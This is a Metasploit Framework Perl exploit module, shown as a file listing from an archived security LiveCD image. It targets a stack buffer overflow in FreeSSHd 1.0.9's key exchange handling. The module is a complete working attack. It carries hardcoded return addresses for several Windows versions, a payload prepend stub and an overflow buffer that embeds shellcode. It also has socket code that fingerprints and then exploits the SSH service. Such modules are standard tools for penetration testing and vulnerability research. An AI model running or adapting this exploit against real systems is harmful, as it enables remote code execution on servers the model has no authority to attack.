home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / exploits / freesshd_key_exchange.pm < prev    next >
Text File  |  2006-06-30  |  3KB  |  116 lines

  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Exploit::freesshd_key_exchange;
  11. use base "Msf::Exploit";
  12. use strict;
  13. use Pex::Text;
  14.  
  15. my $advanced = { };
  16.  
  17. my $info =
  18.   {
  19.  
  20.     'Name'  => 'FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow',
  21.     'Version'  => '$Revision: 1.2 $',
  22.     'Authors' => [ 'y0 [at] w00t-shell.net', ],
  23.     'Arch'  => [ 'x86' ],
  24.     'OS'    => [ 'win32', 'win2000', 'winxp' ],
  25.     'Priv'  => 0,
  26.     'UserOpts'  =>
  27.       {
  28.         'RHOST' => [1, 'ADDR', 'The target address'],
  29.         'RPORT' => [1, 'PORT', 'The target port', 22],
  30.         'SSL'   => [0, 'BOOL', 'Use SSL'],
  31.       },
  32.     'AutoOpts' => { 'EXITFUNC' => 'process' },
  33.     'Payload' =>
  34.       {
  35.         'Space'     => 500,
  36.         'BadChars'  => "\x00",
  37.         'Prepend'   => "\x81\xc4\xff\xef\xff\xff\x44",
  38.         'Keys'      => ['+ws2ord'],
  39.       },
  40.  
  41.     'Description'  => Pex::Text::Freeform(qq{
  42.          This module exploits a simple stack overflow in FreeSSHd 1.0.9.
  43.     This flaw is due to a buffer overflow error when handling a specially 
  44.     crafted key exchange algorithm string received from an SSH client,  
  45. }),
  46.  
  47.     'Refs'  =>
  48.       [
  49.         ['BID', '17958'],
  50.       ],
  51.     'Targets' =>
  52.       [
  53.         ['Windows 2000 SP4 English',   0x77e56f43],
  54.         ['Windows XP Pro SP0 English', 0x77e51877],
  55.         ['Windows XP Pro SP1 English', 0x77e53877],
  56.         ['Windows 2003 SP0-SP1 English', 0x77d7cdec], # David Maciejak
  57.       ],
  58.  
  59.     'Keys' => ['ssh'],
  60.  
  61.     'DisclosureDate' => 'May 12 2006',
  62.   };
  63.  
  64. sub new {
  65.     my $class = shift;
  66.     my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  67.     return($self);
  68. }
  69.  
  70. sub Exploit
  71. {
  72.     my $self = shift;
  73.     my $target_host = $self->GetVar('RHOST');
  74.     my $target_port = $self->GetVar('RPORT');
  75.     my $target_idx  = $self->GetVar('TARGET');
  76.     my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
  77.     my $target = $self->Targets->[$target_idx];
  78.  
  79.     my $sploit =
  80.       "SSH-2.0-OpenSSH_3.9p1".
  81.       "\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00\x00\x00".
  82.       "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde".
  83.       Pex::Text::AlphaNumText(1055). pack('V', $target->[1]).
  84.       $shellcode. Pex::Text::AlphaNumText(19000). "\r\n";
  85.  
  86.     $self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1]));
  87.  
  88.     my $s = Msf::Socket::Tcp->new
  89.       (
  90.         'PeerAddr'  => $target_host,
  91.         'PeerPort'  => $target_port,
  92.         'LocalPort' => $self->GetVar('CPORT'),
  93.         'SSL'       => $self->GetVar('SSL'),
  94.       );
  95.     if ($s->IsError) {
  96.         $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
  97.         return;
  98.     }
  99.  
  100.     my $resp = $s->Recv(-1);
  101.     chomp($resp);
  102.     $self->PrintLine('[*] FreeSSHD: ' . $resp);
  103.  
  104.     if($resp !~ /SSH-2\.0-WeOnlyDo 1\.2\.7/) {
  105.         $self->PrintLine('[*] Not a FreeSSHD service... ');
  106.         return;
  107.     }
  108.  
  109.     $s->Send($sploit);
  110.     $self->Handler($s);
  111.     $s->Close();
  112.     return;
  113. }
  114. 1;
  115.  
  116.